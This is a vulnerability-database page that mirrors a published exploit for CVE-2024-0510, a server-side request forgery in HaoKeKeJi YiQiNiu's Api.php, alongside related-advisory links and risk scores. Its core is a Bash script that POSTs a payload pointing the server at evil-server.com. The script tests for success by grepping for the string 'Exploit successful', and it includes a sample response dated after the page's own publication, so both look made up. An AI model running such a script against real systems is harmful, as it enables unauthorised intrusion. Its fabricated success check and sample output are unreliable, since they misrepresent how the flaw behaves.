Lucene search
K

HaoKeKeJi YiQiNiu Server-Side Request Forgery

🗓️ 15 Jan 2024 00:00:00Reported by Amirhossein BahramizadehType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 391 Views

HaoKeKeJi YiQiNiu Server-Side Request Forgery. Bash script to send malicious request to example.com's API, with a check for successful exploit.

Related
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2024-0510
13 Jan 202423:26
circl
CNNVD
HaoKeKeJi YiQiNiu Code Issue Vulnerability
13 Jan 202400:00
cnnvd
CVE
CVE-2024-0510
13 Jan 202422:00
cve
Cvelist
CVE-2024-0510 HaoKeKeJi YiQiNiu Api.php http_post server-side request forgery
13 Jan 202422:00
cvelist
EUVD
EUVD-2024-16305
3 Oct 202520:07
euvd
NVD
CVE-2024-0510
13 Jan 202422:15
nvd
OSV
CVE-2024-0510
13 Jan 202422:15
osv
Prion
Server side request forgery (ssrf)
13 Jan 202422:15
prion
Positive Technologies
PT-2024-15626 · Unknown · Haokekeji Yiqiniu
13 Jan 202400:00
ptsecurity
RedhatCVE
CVE-2024-0510
4 Feb 202523:05
redhatcve
Rows per page
`#!/bin/bash  
  
# Set target URL and payload  
target_url="http://example.com/application/pay/controller/Api.php"  
payload="url=http://evil-server.com/exploit"  
  
# Send the malicious request  
response=$(curl -s -X POST -d "$payload" "$target_url")  
  
# Check if the exploit was successful  
if echo "$response" | grep -q "Exploit successful"; then  
echo "Exploit succeeded"  
else  
echo "Exploit failed"  
fi  
  
# Example payload and response  
payload="url=http://evil-server.com/exploit"  
response="HTTP/1.1 200 OK  
Server: nginx/1.14.0 (Ubuntu)  
Date: Mon, 01 Dec 2024 20:23:43 GMT  
Content-Type: text/html; charset=UTF-8  
Content-Length: 25  
Connection: keep-alive  
  
Exploit successful"  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

15 Jan 2024 00:00Current
7.4High risk
Vulners AI Score7.4
CVSS 3.17.3 - 9.8
CVSS 27.5
CVSS 37.3
EPSS0.00152
SSVC
391